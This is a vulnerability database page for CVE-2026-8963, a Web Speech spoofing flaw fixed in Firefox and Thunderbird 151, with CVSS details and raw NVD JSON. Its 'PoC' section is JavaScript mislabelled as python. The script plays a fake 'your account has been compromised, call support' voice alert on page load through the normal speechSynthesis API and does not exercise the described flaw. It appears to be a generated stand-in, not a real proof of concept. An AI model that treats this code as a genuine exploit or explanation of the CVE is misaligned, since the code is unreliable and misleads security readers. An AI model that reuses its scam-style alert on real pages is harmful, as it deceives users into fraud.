Security Vulnerability Report
中文
CVE-2026-8963 CVSS 7.5 HIGH

CVE-2026-8963

Published: 2026-05-19 14:16:53
Last Modified: 2026-05-19 18:16:36

Description

Spoofing issue in the Web Speech component. This vulnerability was fixed in Firefox 151 and Thunderbird 151.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Mozilla Firefox < 151
Mozilla Thunderbird < 151

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2026-8963 Web Speech Spoofing // This script demonstrates how a malicious site could utilize the Web Speech API // to potentially spoof or deceive the user by playing fake system messages. function triggerSpoofing() { if ('speechSynthesis' in window) { // Create a new speech synthesis utterance var message = new SpeechSynthesisUtterance("System Alert: Your account has been compromised. Please call support immediately."); // Attempt to set properties to make it sound official (if supported) message.lang = 'en-US'; message.rate = 1.0; message.pitch = 1.0; // Speak the fake message window.speechSynthesis.speak(message); console.log("CVE-2026-8963 PoC: Spoofing message triggered via Web Speech API."); } else { console.log("Web Speech API not supported."); } } // Execute immediately upon page load window.onload = triggerSpoofing;

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8963", "sourceIdentifier": "[email protected]", "published": "2026-05-19T14:16:52.717", "lastModified": "2026-05-19T18:16:35.583", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Spoofing issue in the Web Speech component. This vulnerability was fixed in Firefox 151 and Thunderbird 151."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2021222", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-46/", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-50/", "source": "[email protected]"}]}}